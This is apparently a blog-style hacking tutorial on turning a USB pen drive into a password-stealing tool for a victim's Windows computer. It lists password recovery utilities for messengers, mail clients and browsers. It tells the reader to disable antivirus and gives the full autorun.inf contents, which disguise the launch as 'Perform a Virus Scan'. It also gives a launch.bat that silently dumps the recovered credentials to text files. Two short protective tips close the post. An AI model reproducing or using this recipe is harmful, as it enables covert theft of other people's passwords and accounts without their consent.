Have you ever imagined that a tiny USB/Pen Drive
can be used as a deadly gadget for hacking
passwords? Yes, it can be made possible. See
below to find the truth.
The Windows operating system stores some of the
mostly used passwords for the user for the
general purposes. This includes a number of
necessary applications:-
Useful and instant messenger MSN, AOL, g-talk
etc.
The outlook express
SMTP, POP, FTP account
Auto-complete saved passwords for different
web browsers like Internet Explorer, Firefox,
google chrome etc.
Some applications/tools can be made to search
for these saved passwords. All we need is a
customized rootkit. Let’s see what will contain in
our rootkit.
Massen Pass: It will recover all the passwords
from the mostly used messenger applications like
MSN Messenger, AOL Messenger, Yahoo
Messenger, ICQ and many more.
Mail Pass view: It will recover the saved
passwords from well-known e-mail clients like
Microsoft Outlook express, Mozilla Thunderbird,
Netscape Mail, IncrediMail, Eudora etc. Moreover,
this Mail pass view can be used to recover the
passwords of web-based e-mail accounts which
include Hotmail, Yahoo!, Gmail etc. if the user is
using the associated programs to access the
accounts.
Web Browser Pass view: It will recover the
passwords saved in all the web browsers installed
in the PC. It includes all supported web browsers
like Internet explorer, Google chrome, Mozilla
Firefox, apple safari, Netscape browser, Opera etc.
Procedure for creating the customized
rootkit:
NOTE : For the creation steps, first disable the
antivirus.
1. Extract the above discussed applications into
the USB pendrive. Download link: secure
2. Create a notepad and just fill the content
below into it.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Then save the notepad as autorun.inf and copy
the newly created autorun.inf onto the USB
pendrive.
* Then create another notepad and paste the
content below onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start webbrowserpassview.exe /stext
webbrowserpassview.txt
* Then save the said notepad file as launch.bat
* Copy the launch.bat to the USB pendrive as
you have done earlier.
* That’s it. The rootkit is ready to operate and
explore onto the victim’s computer.
Steps to follow:
1. After inserting the pendrive, an autorun
window shall pop-up. Just select the first
option of performing a virus scan.
2. Now all the pre-programmed applications will
do their work of collecting passwords in the
background and stored in .txt files.
Steps to safe yourself from these dirty
tricks :
1. Don’t go for any pop-up provided scanning
procedure. Always go for scanning by antivirus
only from the antivirus window.
2. Keep your antivirus updated regularly.